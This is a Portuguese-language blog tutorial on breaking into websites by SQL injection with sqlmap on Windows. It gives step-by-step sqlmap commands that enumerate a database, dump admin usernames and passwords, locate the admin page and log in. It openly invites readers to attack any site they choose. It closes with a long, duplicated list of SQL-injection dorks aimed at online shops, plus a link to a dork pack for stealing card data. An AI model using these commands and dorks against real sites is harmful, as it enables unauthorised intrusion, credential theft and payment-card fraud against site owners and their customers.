 |
| windows hack |
windows hack com sqlmap
windows hack invasao de sites com sqlmap, nesse tutorial iremos usar o windows 8.1 como maquina atacante para invasao de sites com sqlmap ,os requirimentos para o tutorial são instalar python no seu computador windows entre no link: https://www.python.org/downloads/windows outro e baixar o sqlmap para o seu windows entre no link: http://sqlmap.org primeiro vá no site do python e baixe o executavel e instale no seu computador
 |
| python para windows |
agora vá no site do sqlmap no link: http://sqlmap.org baixe o sqlmap
 |
windows hack sqlmapwindows hack tutorial
windows hack invasao com sqlmap, bem depois de baixa o python para o seu computador windows vá na pasta do python no diretório C:\ faça uma pasta com o nome de pentest e cole a pasta do sqlmap la.
 |
agora abra o cmd ou o powershell e digite cmd e aperte enter e va na pasta no a onde você colocou o sqlmap e digite o comando sqlmap.py --help ira aparecer no prompt de comandos as opções do sqlmap
 |
| windows hack powershell windows 8.1
iremos ver a maquina virtual de teste para sql injetion no método get só vamos da o comando ping no ip da maquina virtual para ver se ela reponde caso queira baixar a maquina virtual para teste vá no link: MAQUINA VIRTUAL PARA TESTES SQL INJETION e escolha a opção VMWARE IMAGE e faça o download da maquina virtual para testes de invasão em sql injetion bem agora vamos da um ping na maquina virtual. a senha para acesso a maquina virtual e user: exploit password: exploit
 |
bem funcionou vamos ir ate o ip da maquina virtual abra o seu navegador e cole o ip da maquina virtual ou vá ate um site que você queira invadir
 |
| windows hack sql injetion
bem agora vamos escolher um dos links para podemos pega uma das url vulnerável ao ataque sql injetion.
 |
bem vamos pega a url e fazer o ataque digite o comando sqlmap.py -u http://192.168.19.137/newpage.php?id=3 --current-db e aperte enter
- -u: coloque a url do site
- --current-db: o banco de dados atual do site
 |
| windows hack sqlmap |
o sqlmap vai fazendo vários testes no site para ver se ele esta vulnerável a sql injetion, talvez o sqlmap faça algumas perguntas só aperte enter
-u: coloque a url do site
-D: o banco de dados do site
--tables: as tabelas do banco de dados do site
agora vamos as colunas da tabela members, digite o comando sqlmap.py -u http://192.168.19.137/newpage.php?id=3 -D exploit -T members --columns
 |
| windows hack com sqlmap
o site esta veraneável a sql injetion e o banco de dados atual do site e o EXPLOIT
 |
agora vamos digita o comando sqlmap.py -u http://192.168.19.137/newpage.php?id=3 -D exploit --tables
 |
| windows hack prompt sqlmap
veja a baixo o sqlmap pegou as tabelas do banco de dados exploit do site vulnerável a sql injetion, vamos escolher a coluna members me parece ser muito interessante talvez a senha do admin do site esteja lá .
 |
- -u: coloque a url do site
- -D: banco de dados
- -T: tabelas do banco de dados
- -columns: colunas da tabelas
 |
| windows hack powershell
veja a baixo as colunas da tabela member tem username e password
 |
agora vamos pega o conteúdo das colunas password e username, digite o comando sqlmap.py -u http://192.168.19.137/newpage.php?id=3 -D exploit -T members -C password,username --dump
- -u: coloque a url do site
- -D: banco de dados
- -T: tabelas do banco de dados
- --columns: colunas da tabelas
- --dump: pega o conteúdo das colunas
 |
| windows hack powershell hacker
veja abaixo que pegamos o username e o password, o username esta em branco porque fiz alguns testes antes e atualizei o sqlmap talvez isso pode ter afetado os resultados mais o username e admin.
 |
agora vamos no local a onde o sqlmap guardou as informações do banco de dados, veja ele esta no disco C:\users\hibrido\sqlmap\out\192.168.19.137 vamos ver o diretório, vamos abrir com o wordpad
 |
| sqlmap output
bem agora vamos tenta achar a pagina do admin do site então entre no links abaixo, esses links são de scripts em python mas irei deixa um script em perl claro que para você usa o script em perl você precisa de perl no seu windows então em caso queira baixar perl entre no link: http://www.activestate.com/activeperl/downloads bem entre no links e pegue os scripts para encontrar a pagina de admin
pagina admin scripts |
bem abra a pasta pentest que criamos antes e coloque a pasta o script la, o script usado sera em python.
 |
| windows hack
entre na pasta do script e digite adm-finder.py e ira abrir uma tela para você colocar a url do site
 |
copie a url e cole o script ira tenta em contra a pagina de administração do site, veja que a pagina de admin foi encontrada http://192.168.19.137/admin
vamos abrir o browser e ir para a pagina de admin
 |
| pagina admin
agora vamos testa o username e password que encontramos. veja que o site foi invadido agora se pode fazer o que quiser com ele.
 windows hack livro para invasão
livro do sqlmap, tenha o livro do sqlmap e aprenda os comandos e suas funcionalidades.
 |
sql injetion dorks para invasão de sites
bem irei deixa aqui algumas dorks de sql injetion para invasão de sites e também um pack de dorks sql injetion para invasão de lojas isso mesmo um pack de dorks para infocc caso queira fazer o download do pack de dorks para infocc clique no link: PACK INFOCC
algumas dorks sql 2017
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
Nenhum comentário:
Postar um comentário